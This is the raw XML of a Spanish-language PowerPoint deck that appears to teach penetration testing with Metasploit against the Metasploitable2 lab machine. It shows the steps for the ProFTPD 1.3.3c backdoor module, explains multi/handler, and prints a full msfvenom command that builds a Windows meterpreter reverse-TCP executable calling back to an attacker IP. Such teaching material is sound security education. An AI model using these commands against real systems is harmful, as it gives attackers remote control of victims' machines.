          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>Práctica con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> (Prueba de Concepto)</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636D2D24-DF09-9FEC-FDF4-CEC148D8793D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10726614" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>Ejemplo Realista: Usaremos una máquina vulnerable conocida como Metasploitable2 para demostrar el proceso. Flujo de Comandos: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>Iniciar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>Buscar el módulo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>nombre_de_la_vulnerabilidad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>Seleccionar el módulo: use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>ruta_del_exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>&gt; (ej. use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>/ftp/proftpd_133c_backdoor) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>Configurar opciones: show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>, set RHOSTS &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>IP_víctima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>&gt;, set PAYLOAD &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tipo_de_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" sz="2000" b="1" dirty="0"/>
              <a:t>&gt; Ejecutar: run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344000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5122" name="Picture 2" descr="Metasploit unresponsive after opening a session · Issue #15425 · rapid7/ metasploit-framework">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA13094-955F-F76F-340A-9F2FC4987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9152" b="1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20" y="975"/>
            <a:ext cx="7552924"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B8744694-A2B7-D7F1-FBBF-737C24172851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865806" y="2251587"/>
            <a:ext cx="3706762" cy="3972232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>¿Qué es multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> es un módulo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> que actúa como un oyente (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>). Su única función es esperar a que un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> se conecte a él. No es un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> en sí mismo, sino una herramienta para gestionar las sesiones que se establecen a través de un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>. Es decir, la máquina víctima es la que inicia la conexión hacia la máquina del atacante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389792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0C7237-01FF-4EFA-551B-DB0A8B3D443F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>Paso a paso para usar multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>Generar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>: El atacante utiliza la herramienta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>, que viene con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>, para crear un programa malicioso ejecutable. Este programa contiene el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> (por ejemplo, una reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>) que, al ser ejecutado en la máquina víctima, se conectará de vuelta a la máquina del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>atacante.sar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF133C37-AB57-F1CB-1DB9-0326A4692727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>Ejemplo de comando de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> LHOST=192.168.1.10 LPORT=4444 -f exe &gt; shell.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>-p: Especifica el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>LHOST: La dirección IP del atacante (tu máquina). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>LPORT: El puerto que el oyente estará esperando. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>-f: Formato del archivo (exe). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>&gt;: Redirige la salida a un archivo (shell.exe).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41636435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656</TotalTime>
  <Words>1589</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>72</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Amasis MT Pro Black</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Celestial</vt:lpstr>
      <vt:lpstr>Explotación  el arte de usar tus habilidades</vt:lpstr>
      <vt:lpstr>Del Reconocimiento a la Explotación: Usando Searchsploit y Metasploit</vt:lpstr>
      <vt:lpstr>La Biblioteca de Exploits</vt:lpstr>
      <vt:lpstr>Metasploit Framework: La Plataforma de Explotación</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Estableciendo la Conexión (Reverse Shell)</vt:lpstr>
      <vt:lpstr>Práctica con Metasploit (Prueba de Concepto)</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Paso a paso para usar multi/handler: Generar el Payload: El atacante utiliza la herramienta msfvenom, que viene con Metasploit, para crear un programa malicioso ejecutable. Este programa contiene el payload (por ejemplo, una reverse shell) que, al ser ejecutado en la máquina víctima, se conectará de vuelta a la máquina del atacante.sar multi/handler:</vt:lpstr>
      <vt:lpstr>Con metasploit</vt:lpstr>
      <vt:lpstr>Explicación del Flujo de Ataque 🧠</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>¿Dónde entra el multihandler?</vt:lpstr>
      <vt:lpstr>La Meterpreter Shell: El Payload Avanzado</vt:lpstr>
      <vt:lpstr>Consideraciones Avanzadas y Post-Explotación</vt:lpstr>
      <vt:lpstr>glosario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Patricio Ignacio Carrasco Zura</dc:creator>
  <cp:lastModifiedBy>Patricio Ignacio Carrasco Zura</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-22T01:27:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-22T12:24:46Z</dcterms:modified>
</cp:coreProperties>
</file>